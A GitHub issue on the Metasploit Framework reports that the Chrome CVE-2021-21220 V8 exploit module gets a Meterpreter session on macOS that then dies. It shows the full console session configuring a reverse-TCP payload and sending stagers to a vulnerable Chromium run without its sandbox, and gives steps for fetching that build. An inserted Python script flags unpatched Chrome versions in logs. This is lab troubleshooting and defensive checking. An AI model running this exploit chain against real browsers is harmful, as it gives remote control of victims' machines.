rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Chrome OSX (cve_2021_21220_v8_insufficient_validation) #19512

Closed RootUp closed 1 month ago

RootUp commented 2 months ago

I am not sure if I am doing something wrong here, but I am encountering the error below when testing "cve_2021_21220_v8_insufficient_validation" against macOS with a vulnerable browser: the session dies after some time while the browser keeps loading the exploit URL. This exploit works perfectly on Windows, but I have an issue on macOS.

System version: macOS 14.6.1 (23G93); Chromium: Version 90.0.4430.0 (Developer Build) (x86_64)

Configuration: (MSF is running on a Kali VM and the network is on NAT; the base is macOS, which has Chrome running.)

msf6 > search cve_2021_21220

Matching Modules
================

   #  Name                                                                    Disclosure Date  Rank    Check  Description
   -  ----                                                                    ---------------  ----    -----  -----------
   0  exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation  2021-04-13       manual  No     Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation

msf6 > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set TArGET 2
TArGET => 2
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > show payloads

Compatible Payloads
===================

   #   Name                                           Disclosure Date  Rank    Check  Description
   -   ----                                           ---------------  ----    -----  -----------
   0   payload/generic/custom                                          normal  No     Custom Payload
   1   payload/generic/shell_bind_aws_ssm                              normal  No     Command Shell, Bind SSM (via AWS API)
   2   payload/generic/shell_bind_tcp                                  normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                               normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/ssh/interact                                    normal  No     Interact with Established SSH Connection
   5   payload/osx/x64/dupandexecve/bind_tcp                           normal  No     OS X dup2 Command Shell, Bind TCP Stager
   6   payload/osx/x64/dupandexecve/reverse_tcp                        normal  No     OS X dup2 Command Shell, Reverse TCP Stager
   7   payload/osx/x64/dupandexecve/reverse_tcp_uuid                   normal  No     OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
   8   payload/osx/x64/exec                                            normal  No     OS X x64 Execute Command
   9   payload/osx/x64/meterpreter/bind_tcp                            normal  No     OSX Meterpreter, Bind TCP Stager
   10  payload/osx/x64/meterpreter/reverse_tcp                         normal  No     OSX Meterpreter, Reverse TCP Stager
   11  payload/osx/x64/meterpreter/reverse_tcp_uuid                    normal  No     OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
   12  payload/osx/x64/say                                             normal  No     OS X x64 say Shellcode
   13  payload/osx/x64/shell_bind_tcp                                  normal  No     OS X x64 Shell Bind TCP
   14  payload/osx/x64/shell_reverse_tcp                               normal  No     OS X x64 Shell Reverse TCP

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set PAYLOAD 11
PAYLOAD => osx/x64/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set LHOST 172.16.30.21
LHOST => 172.16.30.21
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set URIPATH /doodoo
URIPATH => /doodoo
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > options 

Module options (exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /doodoo          no        The URI to use for this exploit (default is random)

Payload options (osx/x64/meterpreter/reverse_tcp_uuid):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.30.21     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)

View the full module info with the info, or info -d command.

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.30.21:4444 
[*] Using URL: http://172.16.30.21:8080/doodoo
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > [*] Server started.

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > 
[*] 172.16.30.1      chrome_cve_2021_21220_v8_insufficient_validation - Sending /doodoo to Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.0 Safari/537.36
[*] Transmitting first stager...(214 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (810648 bytes) to 172.16.30.1

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
[-] The "sysinfo" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
meterpreter > load stdapi
[-] The "load" command is not supported by this Meterpreter type (x64/osx)
meterpreter > 
[-] Meterpreter session 1 is not valid and will be closed

[*] 172.16.30.1 - Meterpreter session 1 closed.

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > version 
Framework: 6.3.27-dev
Console  : 6.3.27-dev
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >

Running Chrome:

bash-3.2$ /Users/zero/Downloads/chrome-mac/Chromium.app/Contents/MacOS/Chromium --no-sandbox

Downloading Vuln Chromium:

Navigate to https://vikyd.github.io/download-chromium-history-version/#/, select Mac, and enter the version, i.e. 90.0.4430.00; it should redirect to the Chromium download.
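A defender-side check added here, not part of the issue or of the Metasploit module: it scans web-server access logs for Chrome/Chromium builds that the module's target line still lists as unpatched (anything below 89.0.4389.128, or a 90.x build below 90.0.4430.72), using the User-Agent recorded in the session output above. The combined-log format and the other sample lines are constructed for this example.

```python
import re

# Fix thresholds as stated in the module's target line on this page:
# vulnerable if Chrome < 89.0.4389.128, or a 90.x build < 90.0.4430.72.
FIXED_89 = (89, 0, 4389, 128)
FIXED_90 = (90, 0, 4430, 72)

CHROME_RE = re.compile(r"\bChrom(?:e|ium)/(\d+)\.(\d+)\.(\d+)\.(\d+)\b")
# Combined log format: client IP is the first field, User-Agent the last quoted one.
LOG_RE = re.compile(r'^(\S+) .* "([^"]*)"$')


def parse_chrome_version(user_agent: str):
    """Return the 4-part Chrome/Chromium version tuple from a UA, or None if absent."""
    m = CHROME_RE.search(user_agent)
    return tuple(int(p) for p in m.groups()) if m else None


def is_vulnerable_cve_2021_21220(version) -> bool:
    """Compare a 4-part version tuple against the fixed builds named by the module."""
    if version < FIXED_89:
        return True
    if version[0] == 90 and version < FIXED_90:
        return True
    return False


def flag_vulnerable_clients(log_lines):
    """Return (client_ip, version_string) for each request from an unpatched browser."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, ua = m.groups()
        ver = parse_chrome_version(ua)
        if ver is not None and is_vulnerable_cve_2021_21220(ver):
            hits.append((ip, ".".join(map(str, ver))))
    return hits


# Constructed sample log lines; the first UA is the one recorded in the issue above.
SAMPLE_LOG = [
    '172.16.30.1 - - [01/Oct/2024:10:00:00 +0000] "GET /doodoo HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.0 Safari/537.36"',
    '10.0.0.5 - - [01/Oct/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36"',
    '10.0.0.6 - - [01/Oct/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36"',
    '10.0.0.7 - - [01/Oct/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0"',
]

if __name__ == "__main__":
    for ip, ver in flag_vulnerable_clients(SAMPLE_LOG):
        print(f"{ip} is running unpatched Chrome {ver} (CVE-2021-21220)")
```

User-Agent strings can be spoofed, so treat a hit as a prompt to verify the endpoint's browser inventory, not as proof of the installed build.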

github-actions[bot] commented 1 month ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.